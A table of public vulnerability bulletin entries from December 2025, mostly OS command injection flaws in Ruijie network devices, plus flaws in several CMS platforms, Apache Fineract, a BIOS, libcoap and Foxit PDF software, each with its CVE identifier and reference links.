| n/a--Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 | OS Command Injection vulnerability in Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56086 | https://1drv.ms/f/c/12406a392c92914b/EuESCSUsYvtAtfW1SfmGGxsBw-kN9iCbpnUU9T8TXofH3w?e=kp5OXK https://1drv.ms/t/c/12406a392c92914b/ETgTxS2wFBlCjG4DP56-PjkBWwvraLHZ-BVaWh9Vs9_SuA?e=aTbjEe https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56086.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the run_tcpdump in file /usr/lib/lua/luci/controller/admin/common_tcpdump.lua. | 2025-12-11 | not yet calculated | CVE-2025-56087 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/Echt6Ult6oNBv8c0GnssJeEBmbJbPx8enDixRCuyiWcKsw?e=2zJ5I2 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56087.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_service in file /usr/lib/lua/luci/controller/admin/service.lua. | 2025-12-11 | not yet calculated | CVE-2025-56088 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/EQ5pK82-KmxKht6YgsEzaOsBzrC05Cael1vwpfM9ZxX97Q?e=qEgmtB https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56088.md |
| n/a--Ruijie M18 EW_3.0(1)B11P226_M18_10223116 | OS Command Injection vulnerability in Ruijie M18 EW_3.0(1)B11P226_M18_10223116 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56089 | https://1drv.ms/t/c/12406a392c92914b/Ea56irtVj4dNs59Pzz7fkiIBQeVLjDcMDEXC2FpCQydIZQ?e=70gcOe https://1drv.ms/f/c/12406a392c92914b/EmXarTTNPwFHjk8lLwQIqj8Ba9nlq-owLMBtEKpBwMrn5A?e=vvi2dM https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56089.md |
| n/a--Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56090 | https://1drv.ms/t/c/12406a392c92914b/EfSHWqE3N11FpgQsV1BlZk0BxXIhFQjIp_xmJYIq1APvrw?e=JCIm6k https://1drv.ms/f/c/12406a392c92914b/EkH0xWseMXBJg-Ck_uD34fcB-3pDo3MAQc2AKNlXqwYr2w?e=GU9l62 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56090.md |
| n/a--Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 | OS Command Injection vulnerability in Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56091 | https://1drv.ms/t/c/12406a392c92914b/EdiWfxSbC0pAu_oksKjm2xgBXSCavYBBJt8V51JkcH4Dsw?e=OhOVCN https://1drv.ms/f/c/12406a392c92914b/EgUg1zJuaItDmLxZhkCg4B8BcJTRYnXyX4ePIIjNoZrRew?e=a23cK6 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56091.md |
| n/a--Ruijie X30 PRO V1 X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30 PRO V1 X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56092 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/EaD98URfTfFKm1v_MTfU-UEBUxRf5vj3O0x7fhabn5_l9A?e=BuNPV9 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56091.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the setWisp in file /usr/lib/lua/luci/modules/wireless.lua. | 2025-12-11 | not yet calculated | CVE-2025-56093 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/Edoz9sBTjeJMqw8K0f3lWgMBNxBlpE9IIUwOX2h2S1cMhw?e=46VlOq https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56092.md https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56093.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/host_access_delay.lua. | 2025-12-11 | not yet calculated | CVE-2025-56094 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/EX8LVTGd3L9OrXvTuHDFITQBnWL-5C-CINxUmowR7vCVig?e=Quevaq https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56094.md |
| n/a--Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56095 | https://1drv.ms/f/c/12406a392c92914b/EkH0xWseMXBJg-Ck_uD34fcB-3pDo3MAQc2AKNlXqwYr2w?e=GU9l62 https://1drv.ms/t/c/12406a392c92914b/EQgGsVREbAJEv4dCG7LAzoYBUiS4nCjWKun_QhenDHzU0Q?e=Ly0lll https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56095.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the restart_modules in file /usr/lib/lua/luci/controller/admin/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56096 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/EQ8FKwFLNjBLlL9hyg_YkUoBdsj_FcNtQsjdmKQ5M4-10A?e=bFC7Jg https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56096.md |
| n/a--Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 | OS Command Injection vulnerability in Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56097 | https://1drv.ms/f/c/12406a392c92914b/Eohr-0awt6VAuiLCNhCG0rgBLQip6nJpl-9Hy0OqB4MvFg?e=DIfBxi https://1drv.ms/t/c/12406a392c92914b/EeVJ2woYmHVHn_C0Sy_iRZsB4yZQFJDXSBOwMSZW0KXJrQ?e=VVGxWb https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56097.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56098 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/EYC9-EvSxKZOum9kuAtPDq4BjKb0c8IV6B52lDEAD33pEA?e=2C0BKO https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56098.md |
| n/a--Ruijie RG-YST AP_3.0(1)B11P280YST250F | OS Command Injection vulnerability in Ruijie RG-YST AP_3.0(1)B11P280YST250F allowing attackers to execute arbitrary commands via a crafted POST request to the pwdmodify in file /usr/lib/lua/luci/modules/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56099 | https://1drv.ms/t/c/12406a392c92914b/ETaD7apCrPFLtMj473NHV2gBaYrKV9A4ZZKMfyWgC949Zw?e=iyjx5g https://1drv.ms/f/c/12406a392c92914b/EjgEtJ5yojhDpEoT-PbidhsBzsbVnT-D-32qK1bCrQN3-g?e=cVRYgN https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56099.md |
| n/a--Ruijie M18 EW_3.0(1)B11P226_M18_10223116 | OS Command Injection vulnerability in Ruijie M18 EW_3.0(1)B11P226_M18_10223116 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56101 | https://1drv.ms/f/c/12406a392c92914b/EmXarTTNPwFHjk8lLwQIqj8Ba9nlq-owLMBtEKpBwMrn5A?e=vvi2dM https://1drv.ms/t/c/12406a392c92914b/EbNlU_0K0v1Krzq7CaUWn0AB_yu3ICrdmwoVuS2txFGMhA?e=0gIUMh https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56101.md |
| n/a--Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 | OS Command Injection vulnerability in Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56102 | https://1drv.ms/f/c/12406a392c92914b/EgUg1zJuaItDmLxZhkCg4B8BcJTRYnXyX4ePIIjNoZrRew?e=a23cK6 https://1drv.ms/t/c/12406a392c92914b/EXNcf0lLKjZLv6U4-ErArMkBKqwLJhJbiJwuQl5MSd0W3w?e=GfXnnz https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56102.md |
| n/a--Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 | OS Command Injection vulnerability in Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56106 | https://1drv.ms/f/c/12406a392c92914b/EgUg1zJuaItDmLxZhkCg4B8BcJTRYnXyX4ePIIjNoZrRew?e=a23cK6 https://1drv.ms/t/c/12406a392c92914b/EcUP8SMciOVBgNEy31-OnnkBQRk_fUCDWUtdDX8UBfbXEA?e=FuQDPi https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56106.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the submit_wifi in file /usr/lib/lua/luci/controller/admin/common_quick_config.lua. | 2025-12-11 | not yet calculated | CVE-2025-56107 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/ESr3_xpg5ZxFkRAKG7hiGVcBF3Cw_52dWpSvUOtgx3hPhw?e=c5RTxg https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56107.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the pwdmodify in file /usr/lib/lua/luci/modules/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56108 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/Ecib6--fxv9HhrfAdhmP5R4BOPDcTcqTOBt0hQBEx5BTxA?e=s3ejN1 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56108.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_wireless in file /usr/lib/lua/luci/control/admin/wireless.lua. | 2025-12-11 | not yet calculated | CVE-2025-56109 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/Eebxh85meOlFnvAANaOt7WgBy_WVGYtW6X8dzvZBZSenbw?e=aaqmPN https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56109.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_deal_update in file /usr/lib/lua/luci/controller/api/rcmsAPI.lua. | 2025-12-11 | not yet calculated | CVE-2025-56110 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/EWK5h1b7Ig1Pt-jdTSQ6t5wBYIbKPHujlBimUpdYNVR-6A?e=eQRXef https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56110.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the network_set_wan_conf in file /usr/lib/lua/luci/controller/admin/netport.lua. | 2025-12-11 | not yet calculated | CVE-2025-56111 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/ERJa0DnnR29MqtbLLRQirGYB4qA9dAdpn6eIJH9LwNlBmw?e=y6KkGo https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56111.md |
| n/a--Ruijie RG-YST EST, YSTAP_3.0(1)B11P280YST250F V1.xxV2.xx | OS Command Injection vulnerability in Ruijie RG-YST EST, YSTAP_3.0(1)B11P280YST250F V1.xxV2.xx allowing attackers to execute arbitrary commands via a crafted POST request to the pwdmodify in file /usr/lib/lua/luci/modules/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56113 | https://1drv.ms/t/c/12406a392c92914b/EY_XOykAOvJJkGsDkmahTboBmmvNWczbXF3brroYsTWmTA?e=2Itzta https://1drv.ms/f/c/12406a392c92914b/EsGqqVSQqCVBjjz2FhAHAiAB4MCHo41vIuw2wPgLykbupA?e=YgF1gt https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56113.md |
| n/a--Ruijie M18 EW_3.0(1)B11P226_M18_10223116 | OS Command Injection vulnerability in Ruijie M18 EW_3.0(1)B11P226_M18_10223116 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56114 | https://1drv.ms/f/c/12406a392c92914b/EmXarTTNPwFHjk8lLwQIqj8Ba9nlq-owLMBtEKpBwMrn5A?e=vvi2dM https://1drv.ms/t/c/12406a392c92914b/EWfEhLkTSblOur72XhaQ7W4BsxQ1IWXZ-Wkcv9WC7AYb-g?e=LpMdqT https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56114.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56117 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/Ed2lBCN9vhdPnEs7WKvpfEQBp7czazgO9PYxS2TFSHx7TQ?e=HZZaGq https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56117.md |
| n/a--Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 | OS Command Injection vulnerability in Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56118 | https://1drv.ms/t/c/12406a392c92914b/EV2jr71QaoFBjf3SLQcUA6sBcmzSsyx2jJ_XY7yOBk_Sjg?e=WOY7Wd https://1drv.ms/f/c/12406a392c92914b/EqOEJce7qVtBlzpFonUkSfYBz09eegk6KowUdpDNexgUvw?e=qfwDKh https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56118.md |
| n/a--Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 | OS Command Injection vulnerability in Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56120 | https://1drv.ms/f/c/12406a392c92914b/EqOEJce7qVtBlzpFonUkSfYBz09eegk6KowUdpDNexgUvw?e=qfwDKh https://1drv.ms/t/c/12406a392c92914b/EZf6v9BXDpFAs09oCidKJ8oBXclUWtjyMcQv3DgMfISkJg?e=MyjOdI https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56120.md |
| n/a--Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 | OS Command Injection vulnerability in Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56122 | https://1drv.ms/f/c/12406a392c92914b/Eohr-0awt6VAuiLCNhCG0rgBLQip6nJpl-9Hy0OqB4MvFg?e=DIfBxi https://1drv.ms/t/c/12406a392c92914b/EZOBtzLwlmBKschv6sxT_LcBBKnMP_OXO7d24321UD8x8g?e=Dpui5j https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56122.md |
| n/a--Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56123 | https://1drv.ms/f/c/12406a392c92914b/EkH0xWseMXBJg-Ck_uD34fcB-3pDo3MAQc2AKNlXqwYr2w?e=GU9l62 https://1drv.ms/t/c/12406a392c92914b/ERjNMNZRBD5HoYydt7Kb3kwBT4ycJXROxTsVBB-WXXqH6Q?e=q8Lcd2 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56123.md |
| n/a--Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 | OS Command Injection vulnerability in Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56124 | https://1drv.ms/f/c/12406a392c92914b/EqOEJce7qVtBlzpFonUkSfYBz09eegk6KowUdpDNexgUvw?e=qfwDKh https://1drv.ms/t/c/12406a392c92914b/EWnUygFXeTVNigjp81gJ3LQBJ-hCSb_Yq4gGIMxlan7uJg?e=emOIoc https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56124.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the get_wanobj in file /usr/lib/lua/luci/controller/admin/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56127 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/EQkKqI8NW45AgBgScwGNiPABEK0YLvNQFgNtqLaWAhCPVw?e=cLDW5t https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56127.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_diagnosis in file /usr/lib/lua/luci/controller/admin/diagnosis.lua. | 2025-12-11 | not yet calculated | CVE-2025-56129 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/EaJ2e_mzgltOiHqb4t8xIvgBoT2CYEP0nrhZd7IYlCHSPQ?e=miUrrL https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56129.md |
| n/a--Ruijie RG-S1930 S1930SWITCH_3.0(1)B11P230 | OS Command Injection vulnerability in Ruijie RG-S1930 S1930SWITCH_3.0(1)B11P230 allowing attackers to execute arbitrary commands via a crafted POST request to the module_update in file /usr/local/lua/dev_config/ace_sw.lua. | 2025-12-11 | not yet calculated | CVE-2025-56130 | https://1drv.ms/f/c/12406a392c92914b/EpWU9cQdd5RNszcYlTj2cGsBfiClkCwF0zCsLNYer2VIZA?e=ANIgPM https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56130.md |
| n/a--Fearless Geek Media FearlessCMS v.0.0.2-15 | Cross Site Scripting vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to obtain sensitive information via the login.php component. | 2025-12-10 | not yet calculated | CVE-2025-56429 | https://github.com/fearlessgeekmedia/FearlessCMS/issues/36 |
| n/a--Fearless Geek Media FearlessCMS v.0.0.2-15 | Directory Traversal vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to cause a denial of service via the plugin-handler.php and the deleteDirectory function. | 2025-12-10 | not yet calculated | CVE-2025-56430 | https://github.com/fearlessgeekmedia/FearlessCMS/issues/36 |
| n/a--Fearless Geek Media FearlessCMS v.0.0.2-15 | Directory Traversal vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to cause a denial of service via the plugin-handler.php and the file_get_contents() function. | 2025-12-10 | not yet calculated | CVE-2025-56431 | https://github.com/fearlessgeekmedia/FearlessCMS/issues/36 |
| n/a--LeptonCMS version 7.3.0 | LeptonCMS version 7.3.0 contains an arbitrary file upload vulnerability, which is caused by the lack of proper validation for uploaded files. An authenticated attacker can exploit this vulnerability by uploading a specially crafted ZIP/PHP file to execute arbitrary code. | 2025-12-09 | not yet calculated | CVE-2025-56704 | http://lepton.com https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_A.pdf https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_B.pdf https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_C.pdf |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Reflected cross-site scripting vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If a user accesses a crafted page or URL, an arbitrary script may be executed on the web browser of the user. | 2025-12-12 | not yet calculated | CVE-2025-57883 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Apache Software Foundation--Apache Fineract | Insufficiently Protected Credentials vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release. | 2025-12-12 | not yet calculated | CVE-2025-58130 | https://lists.apache.org/thread/d9zpkc86zk265523tfvbr8w7gyr6onoy |
| Apache Software Foundation--Apache Fineract | Authorization Bypass Through User-Controlled Key vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release. | 2025-12-12 | not yet calculated | CVE-2025-58137 | https://lists.apache.org/thread/gz3zhoghlclch3rdnzyrdcf69c0507ww |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Cross-site request forgery vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If a user accesses a malicious page while logged in, unintended operations may be performed. | 2025-12-12 | not yet calculated | CVE-2025-58576 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| AMI--AptioV | APTIOV contains a vulnerability in BIOS where a user may cause "Improper Handling of Insufficient Permissions or Privileges" by local access. Successful exploitation of this vulnerability can lead to escalation of authorization and potentially impact Integrity and Availability. | 2025-12-12 | not yet calculated | CVE-2025-58770 | https://go.ami.com/hubfs/Security%20Advisories/2025/AMI-SA-2025009.pdf |
| Badi Jones--Duplicate Content Cure | Cross-Site Request Forgery (CSRF) vulnerability in Badi Jones Duplicate Content Cure duplicate-content-cure allows Cross Site Request Forgery. This issue affects Duplicate Content Cure: from n/a through <= 1.0. | 2025-12-09 | not yet calculated | CVE-2025-59132 | https://vdp.patchstack.com/database/Wordpress/Plugin/duplicate-content-cure/vulnerability/wordpress-duplicate-content-cure-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| n/a--libcoap's OSCORE | A memory disclosure vulnerability exists in libcoap's OSCORE configuration parser in libcoap before release-4.3.5-patches. An out-of-bounds read may occur when parsing certain configuration values, allowing an attacker to infer or read memory beyond string boundaries in the .rodata section. This could potentially lead to information disclosure or denial of service. | 2025-12-08 | not yet calculated | CVE-2025-59391 | https://github.com/obgm/libcoap/releases/tag/v4.3.5a https://github.com/obgm/libcoap/pull/1730 |
| n/a--Foxit PDF Editor and Reader before 2025.2.1 | Foxit PDF Editor and Reader before 2025.2.1 allow signature spoofing via OCG. When Optional Content Groups (OCG) are supported, the state property of an OCG is runtime-only and not included in the digital signature computation buffer. An attacker can leverage JavaScript or PDF triggers to dynamically change the visibility of OCG content after signing (Post-Sign), allowing the visual content of a signed PDF to be modified without invalidating the signature. This may result in a mismatch between the signed content and what the signer or verifier sees, undermining the trustworthiness of the digital signature. The fixed versions are 2025.2.1, 14.0.1, and 13.2.1. | 2025-12-11 | not yet calculated | CVE-2025-59802 | https://www.foxit.com/support/security-bulletins.html |
